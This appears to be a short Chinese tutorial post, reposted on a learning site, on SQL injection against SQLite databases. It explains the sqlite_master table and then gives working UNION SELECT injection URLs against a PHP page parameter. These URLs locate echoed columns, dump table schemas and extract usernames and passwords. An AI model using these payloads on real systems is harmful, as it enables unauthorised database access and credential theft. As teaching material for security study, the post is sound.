sqlite数据库注入

sqlite数据库大部分在开发时使用，其注入语句也与其他数据库不同

sqlite数据库有一张sqlite_master表，里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息
sqlite数据库的注释符是两个横杠“--”，空格会自动用加号表示
测试回显位置， /new_list.php?id=1 union select 1,2,3,4
开始爆这个表的字段值/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master
直接查/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg

附参考地址：https://blog.csdn.net/qq_39936434/article/details/94722615

来源：https://www.cnblogs.com/weak-chicken/p/12283925.html

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!